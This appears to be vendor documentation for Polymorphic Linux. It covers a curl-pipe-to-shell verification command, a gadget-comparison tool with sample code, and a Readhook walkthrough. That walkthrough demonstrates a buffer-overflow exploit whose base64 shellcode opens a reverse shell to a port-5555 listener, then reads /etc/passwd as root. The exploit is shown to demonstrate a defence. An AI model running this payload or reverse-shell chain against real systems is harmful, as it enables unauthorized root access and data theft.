Verification Script

This script lists the repository that every installed package was downloaded from, so you can verify which packages were replaced by Polymorphic versions.

Note: this script uses the strings utility, which can be found in the binutils package.

curl https://sh.polyverse.com | sh -s list-installed-elf

Entropy Analysis

Polyverse provides a completely self-contained binary ROP/JOP gadget analyzer for comparing two binaries side by side and understanding their structures. It is written entirely in JavaScript and runs as a self-contained, client-side browser application, focused on extreme simplicity of use and portability across platforms.

  1. Browse to https://analyze.polyverse.com
  2. Retrieve a binary from a system that does not have Polymorphic Linux
  3. Drag and drop the binary into the specified space in the web application (usually on the right)
  4. Observe that the analysis will automatically begin
  5. Retrieve a binary from a system that does have Polymorphic Linux installed
  6. Drag and drop the binary into the specified space in the web application (usually on the left)
  7. Observe that the analysis will automatically begin
  8. Observe that the structure of the stock binary is very different from the polymorphic binary

A video can be found on this analysis tool here.
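The analyzer above reports how much gadget structure two binaries share. The following stand-alone script, added here as an illustration and not Polyverse's own code, shows the underlying idea on raw code bytes: it computes the Shannon entropy of each image and two Jaccard overlaps, one over the byte sequences that end in a `ret` (0xc3) and one over the file offsets of those `ret` bytes. The `STOCK` and `POLY` byte strings are constructed samples (the same three tiny functions before and after a hypothetical reordering with padding), not output from a real build.

```python
"""Side-by-side structural comparison of two code images (added example).

Not Polyverse's code: a minimal stand-in for what the gadget analyzer
measures, run over raw .text bytes instead of a parsed ELF file.
"""
import math
from collections import Counter
from typing import Set, Tuple

RET = 0xC3  # x86 near return opcode, the usual gadget terminator


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not blob:
        return 0.0
    counts = Counter(blob)
    n = len(blob)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def ret_tails(blob: bytes, window: int = 4) -> Set[bytes]:
    """The `window` bytes ending at each 0xc3: a crude stand-in for a gadget."""
    return {blob[max(0, i - window + 1): i + 1]
            for i, b in enumerate(blob) if b == RET}


def ret_offsets(blob: bytes) -> Set[int]:
    """Offsets of every 0xc3 byte; a chain built for one build hard-codes these."""
    return {i for i, b in enumerate(blob) if b == RET}


def jaccard(a: set, b: set) -> float:
    """Fraction of the union that both sets share (1.0 when identical)."""
    return len(a & b) / len(a | b) if (a | b) else 1.0


def compare(stock: bytes, poly: bytes) -> Tuple[float, float]:
    """Return (shared gadget tails, shared ret offsets) as Jaccard indices."""
    return (jaccard(ret_tails(stock), ret_tails(poly)),
            jaccard(ret_offsets(stock), ret_offsets(poly)))


# Constructed sample: three tiny "functions" in a stock layout, then the same
# instructions after a hypothetical reordering with nop padding inserted.
STOCK = (b"\x48\x89\xe0\x5f\xc3"          # mov rax,rsp ; pop rdi ; ret
         b"\x58\x5e\xc3"                  # pop rax ; pop rsi ; ret
         b"\x48\x31\xc0\x5a\xc3")         # xor rax,rax ; pop rdx ; ret
POLY = (b"\x90\x90"                       # leading padding shifts every offset
        b"\x48\x31\xc0\x5a\xc3"           # functions reordered ...
        b"\x90\x48\x89\xe0\x5f\x90\xc3"   # ... and padded with nops
        b"\x58\x5e\x90\xc3")

if __name__ == "__main__":
    tails, offsets = compare(STOCK, POLY)
    print(f"entropy stock={shannon_entropy(STOCK):.2f} bits/byte, "
          f"poly={shannon_entropy(POLY):.2f} bits/byte")
    print(f"shared gadget tails: {tails:.0%}, shared ret offsets: {offsets:.0%}")
```

Run against two real `.text` sections (for example, dumped with `objcopy -O binary --only-section=.text`), the offset overlap is the number that matters for an attacker's payload: even when the same instruction sequences still exist somewhere in the scrambled binary, a chain that hard-codes their old locations no longer finds them.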


Readhook Buffer Overflow Simulator and Exploit

Readhook is an intentional (and very helpful) buffer-overflow tool, which red teams and individuals can use to get past the difficult and time-consuming business of crafting an exploit. It allows for a full demonstration of the capabilities of Polymorphic Linux: a malicious payload that works across homogeneous systems will fail when it targets a Polymorphic Linux system.

We can observe Readhook in action by hooking a standard Linux utility (nc) and then having it “phone home” to a listener on port 5555 via a buffer-overflow exploit. We will rely on Docker to host nc (netcat or ncat on some systems) with Readhook, and a host machine will be listening for the call (also using nc, so keep them straight as you step through this). The plain text in each block is a command that you can cut and paste into your shell; the text that follows it is an example of what you can expect to see back from that command.

Shell 1: Start a listener for the exploit to call back to. You’ll need the IP address of this listener so you can generate a payload that knows where to call back to. (Since the host is using Docker for Mac, the Docker DNS entry “docker.for.mac.localhost” can be used, which resolves to the host’s Docker IP address.)

nc -l 5555

Shell 2: Open a new shell and start the echo server with readhook. The following command retrieves the readhook components and runs (a second) nc configured as an “echo server” with readhook active.

docker run --rm --name echo -d -p 8080:8080 alpine:3.7 sh -c 'wget -q -O /tmp/basehook.so https://github.com/plexsolutions/readhook/releases/download/v1.2.2/basehook.so && wget -q -O /tmp/fullhook.so https://github.com/plexsolutions/readhook/releases/download/v1.2.2/fullhook.so && LD_PRELOAD="/tmp/fullhook.so /tmp/basehook.so" nc -l -p 8080 -e /bin/cat'

Shell 2: In the same shell, run (a third) nc to connect to the echo server that you just launched. (It’s running in the background.)

nc localhost 8080
echo-this-back-to-me
echo-this-back-to-me

Shell 2: Also in the same shell, try the same thing with the magic string “xyzzx”, the verb “MAKELOAD”, and the IP address (or DNS name) of the listener (listening in shell 1; in my case, I can use the special Docker DNS name “docker.for.mac.localhost”).

xyzzxMAKELOADdocker.for.mac.localhost

That returns:

xyzzyOVERFLOWAAAAAAAAAAAIAAAAAABCKhAAAAAAAEIqXhoAAAAAUH4AAAAAAABTfmcaAAAAAFB+ABAAAAAAAABwGgAAAABQfgcAAAAAAAAAyFsDAAAATH5YAAAAAABCfmopWJlqAl9qAV4PBUiXSLkCABWzwKhBAlFIieZqEFpqKlgPBWoDXkj/zmohWA8FdfZqO1iZSLsvYmluL3NoAFNIiedSV0iJ5g8FAAAAAAAA

Aha! That’s not an echo, it’s the string that will cause nc to phone home to the listener. Let’s test it out.

Shell 2: Copy the result from above (the long string beginning with xyzzyOVERFLOW) and send it back to the echo server. It contains a magic string and a different verb, “OVERFLOW”.

xyzzyOVERFLOWAAAAAAAAAAAIAAAAAABCKhAAAAAAAEIqXhoAAAAAUH4AAAAAAABTfmcaAAAAAFB+ABAAAAAAAABwGgAAAABQfgcAAAAAAAAAyFsDAAAATH5YAAAAAABCfmopWJlqAl9qAV4PBUiXSLkCABWzwKhBAlFIieZqEFpqKlgPBWoDXkj/zmohWA8FdfZqO1iZSLsvYmluL3NoAFNIiedSV0iJ5g8FAAAAAAAA

Hmm… That’s not an echo either. (It turns out the echo server has given way to our exploit: there is now a reverse shell where our echo server used to be.) Let’s go back to our original listener running in Shell 1 to see what we can do.

Shell 1: Go back to the first shell that is listening to port 5555.

whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin

That’s it! You can do the same thing with any application that links to libc (which is just about everything).
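The MAKELOAD response above is the artifact a responder would want to understand, so here is a small triage script, added as an example and not part of readhook or the walkthrough. It strips the magic string and verb, base64-decodes the body, runs a `strings`-style scan over it, looks for an AF_INET sockaddr carrying the listener port 5555 (and reports the IPv4 address stored after it), and dumps the leading 64-bit values. The `PAYLOAD` constant is the exact string returned in the walkthrough; the function names and the choice of port are this example's own.

```python
"""Triage of the readhook MAKELOAD payload shown above (added example).

Not readhook's code. The response is a magic prefix ("xyzzy"), a verb
("OVERFLOW") and a base64 body. Decoding it shows why the payload only
works against one build: the listener's address and port and the
/bin/sh string are embedded in the shellcode at the end, and the bytes
before it are values laid out for the un-scrambled binary.
"""
import base64
import struct
from typing import List, Optional

MAGIC = "xyzzy"
VERB = "OVERFLOW"

# Copied verbatim from the MAKELOAD response in the walkthrough.
PAYLOAD = (
    "xyzzyOVERFLOWAAAAAAAAAAAIAAAAAABCKhAAAAAAAEIqXhoAAAAAUH4AAAAAAABTfmca"
    "AAAAAFB+ABAAAAAAAABwGgAAAABQfgcAAAAAAAAAyFsDAAAATH5YAAAAAABCfmopWJlq"
    "Al9qAV4PBUiXSLkCABWzwKhBAlFIieZqEFpqKlgPBWoDXkj/zmohWA8FdfZqO1iZSLsv"
    "YmluL3NoAFNIiedSV0iJ5g8FAAAAAAAA"
)


def split_payload(msg: str) -> bytes:
    """Check the magic/verb prefix and decode the base64 body that follows."""
    if not msg.startswith(MAGIC + VERB):
        raise ValueError("not a readhook OVERFLOW message")
    body = msg[len(MAGIC) + len(VERB):]
    return base64.b64decode(body + "=" * (-len(body) % 4))


def printable_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """The `strings`-style scan: runs of printable ASCII of at least min_len."""
    out, run = [], bytearray()
    for b in blob + b"\x00":  # trailing NUL flushes the final run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode())
            run = bytearray()
    return out


def find_callback(blob: bytes, port: int) -> Optional[str]:
    """Find a sockaddr_in for `port` (AF_INET=2 in host order on x86-64,
    port in network order) and return the IPv4 address stored after it."""
    needle = struct.pack("<H", 2) + struct.pack(">H", port)
    i = blob.find(needle)
    if i < 0 or i + 8 > len(blob):
        return None
    return ".".join(str(b) for b in blob[i + 4:i + 8])


def qwords(blob: bytes, count: int) -> List[int]:
    """First `count` little-endian 64-bit values: the build-specific prefix."""
    return list(struct.unpack(f"<{count}Q", blob[:count * 8]))


if __name__ == "__main__":
    blob = split_payload(PAYLOAD)
    print(f"{len(blob)} bytes after decoding")
    print("strings:", printable_strings(blob))
    print("call-back target for port 5555:", find_callback(blob, 5555))
    print("leading qwords:", [f"{q:#018x}" for q in qwords(blob, 4)])
```

The `/bin/sh` string and the call-back address come out of the shellcode, which would run unchanged on any x86-64 system; the values in front of it are what a homogeneous fleet shares and a polymorphic build does not, so on a Polymorphic Linux host the same string still overflows the buffer but the control-flow redirection it carries no longer lands where the author expected.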

Additional Information


The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a worldwide basis.